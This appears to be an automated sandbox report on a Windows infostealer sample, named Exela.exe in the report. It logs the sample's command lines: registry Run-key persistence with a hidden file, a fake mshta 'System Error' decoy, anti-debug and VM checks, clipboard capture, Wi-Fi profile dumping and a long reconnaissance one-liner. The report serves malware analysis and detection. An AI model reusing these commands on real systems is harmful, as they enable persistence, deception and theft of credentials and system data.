Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: !OriginalFilename_asyncio.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_asyncio.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650799388.000001FC75802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_decimal.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibsslH vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_overlapped.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651188730.000001FC75802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepython3.dll. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000000.1659120536.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameExela.exej% vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986952157.000002DCCEDE0000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: OriginalFilenamepython3.dll. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Binary or memory string: OriginalFilenameExela.exej% vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Uses reg.exe to modify the Windows registry
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f
Source: libcrypto-1_1.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9987754672181373
Source: libssl-1_1.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9903915229885057
Source: python311.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9993579269724483
Source: sqlite3.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9976298969897524
Source: unicodedata.pyd.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9937485999103942
Source: libcrypto-1_1.dll.81.dr Static PE information: Section: UPX1 ZLIB complexity 0.9987754672181373
Source: libssl-1_1.dll.81.dr Static PE information: Section: UPX1 ZLIB complexity 0.9903915229885057
Source: python311.dll.81.dr Static PE information: Section: UPX1 ZLIB complexity 0.9993579269724483
Source: sqlite3.dll.81.dr Static PE information: Section: UPX1 ZLIB complexity 0.9976298969897524
Source: unicodedata.pyd.81.dr Static PE information: Section: UPX1 ZLIB complexity 0.9937485999103942
Source: classification engine Classification label: mal100.rans.spre.phis.troj.spyw.evad.winEXE@145/213@4/6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA78560 GetLastError,FormatMessageW,WideCharToMultiByte, 0_2_00007FF72AA78560
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\ExelaUpdateService\ Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1076:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Mutant created: \Sessions\1\BaseNamedObjects\E
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2004:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602 Jump to behavior
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\cmd.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1732846914.000002DCCFFEC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\systeminfo.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\HOSTNAME.EXE hostname
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\query.exe query user
Source: C:\Windows\System32\query.exe Process created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net localgroup
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net localgroup administrators
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user guest
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user administrator
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /svc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc query type= service state= all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show config
Source: unknown Process created: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: unknown unknown Jump to behavior
